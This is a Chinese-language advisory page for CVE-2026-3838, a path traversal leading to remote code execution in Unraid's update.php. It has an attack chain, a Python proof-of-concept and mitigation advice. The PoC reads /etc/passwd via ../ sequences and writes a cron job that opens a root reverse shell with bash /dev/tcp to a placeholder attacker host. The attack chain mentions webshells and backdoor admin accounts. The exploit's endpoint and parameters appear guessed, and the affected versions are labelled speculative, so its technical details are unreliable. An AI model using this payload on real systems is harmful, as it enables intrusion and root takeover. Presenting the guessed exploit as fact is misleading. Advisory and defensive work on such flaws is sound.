CVE-2026-3838 Unraid update.php路径遍历远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2026-3838

漏洞类型

路径遍历/远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Unraid OS

漏洞概述

CVE-2026-3838是存在于Unraid操作系统中的一个高危安全漏洞，CVSS评分高达8.8。该漏洞为路径遍历（Path Traversal）导致的远程代码执行（RCE）漏洞，存在于Unraid的update.php文件中。漏洞的根本原因是在处理用户提供的路径参数时缺乏充分的输入验证，攻击者可以通过构造特殊的路径遍历序列（如../）来访问系统任意文件并最终实现远程代码执行。成功利用此漏洞需要攻击者拥有有效的低权限认证凭据，一旦利用成功，攻击者可以在root权限上下文中执行任意代码，完全控制受影响系统。此漏洞由ZDI（Zero Day Initiative）披露，编号为ZDI-CAN-28951，于2026年3月16日公开披露。由于Unraid通常用于NAS和网络存储场景，漏洞被利用可能导致严重的数据泄露和系统被完全控制的风险。

技术细节

该漏洞存在于Unraid的update.php文件中，是一个典型的路径遍历漏洞。漏洞产生的根本原因是程序在执行文件操作时，直接使用用户提供的路径参数而未进行充分的验证和清理。攻击者可以通过构造包含路径遍历序列（如../）的特殊请求，绕过目录限制访问系统敏感文件或写入恶意文件。在未修复的版本中，update.php脚本接受用户控制的路径参数，并将其直接传递给文件操作函数（如file_get_contents、include、require等），而没有对路径中的../等特殊字符进行过滤或对最终路径进行规范化验证。攻击者利用此漏洞可以：1）读取系统敏感配置文件获取管理员凭据或其他敏感信息；2）通过覆盖或写入关键系统文件（如cron任务、启动脚本）实现持久化；3）最终在root权限下执行任意命令。由于漏洞需要认证但仅需低权限账户，攻击门槛相对较低，危害极大。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标Unraid服务器，访问update.php端点

STEP 2

步骤2

认证获取：攻击者获取Unraid系统的低权限账户凭据（可通过社工、暴力破解或其他途径）

STEP 3

步骤3

路径遍历构造：构造包含../序列的特殊路径参数，如../../../../etc/passwd，绕过目录限制

STEP 4

步骤4

敏感文件读取：利用路径遍历读取系统敏感文件（如/etc/passwd、配置文件）获取更多信息

STEP 5

步骤5

写入恶意脚本：通过update.php将恶意代码写入cron.d、init.d或其他可执行位置

STEP 6

步骤6

代码执行：等待定时任务触发或系统重启，在root权限下执行任意命令

STEP 7

步骤7

持久化控制：建立后门、植入webshell或创建新管理员账户，保持长期访问

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-3838 Unraid Path Traversal RCE PoC
# Reference: ZDI-CAN-28951

import requests
import urllib3
urllib3.disable_warnings()

target = "https://target-unraid-server:443"
username = "attacker"
password = "password123"

session = requests.Session()

# Step 1: Authenticate to Unraid
login_url = f"{target}/update.php"
login_data = {
    "username": username,
    "password": password
}

response = session.post(login_url, data=login_data, verify=False)
print(f"Login status: {response.status_code}")

# Step 2: Path traversal to read sensitive files
# Exploit the lack of path validation in update.php
path_traversal_payload = "../../../../etc/passwd"
exploit_url = f"{target}/update.php?file={path_traversal_payload}"

response = session.get(exploit_url, verify=False)
if response.status_code == 200:
    print("Path traversal successful - /etc/passwd content:")
    print(response.text[:500])

# Step 3: RCE via writing to cron or startup scripts
rce_payload = "../../../../etc/cron.d/malicious"
rce_data = {
    "file": rce_payload,
    "content": "* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1'\n"
}

rce_url = f"{target}/update.php"
response = session.post(rce_url, data=rce_data, verify=False)
print(f"RCE write status: {response.status_code}")

print("\n[!] This PoC demonstrates the vulnerability. Use responsibly and only on authorized systems.")

影响范围

Unraid OS < 6.12.x (推测)

Unraid Update Request组件所有版本

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1）限制对update.php端点的访问，仅允许受信任的IP地址访问；2）启用Unraid的IP访问控制和白名单功能；3）监控日志中的异常路径遍历请求模式；4）定期检查系统关键文件（如cron任务、启动脚本）的完整性；5）考虑使用WAF（Web应用防火墙）规则拦截包含../的请求；6）如果不需要更新功能，可临时禁用update.php功能或删除该文件（需谨慎评估影响）。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-3838
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-3838
3 Details https://www.cvedetails.com/cve/CVE-2026-3838/
4 VulDB https://vuldb.com/cve/CVE-2026-3838
5 Link https://www.zerodayinitiative.com/advisories/ZDI-26-171/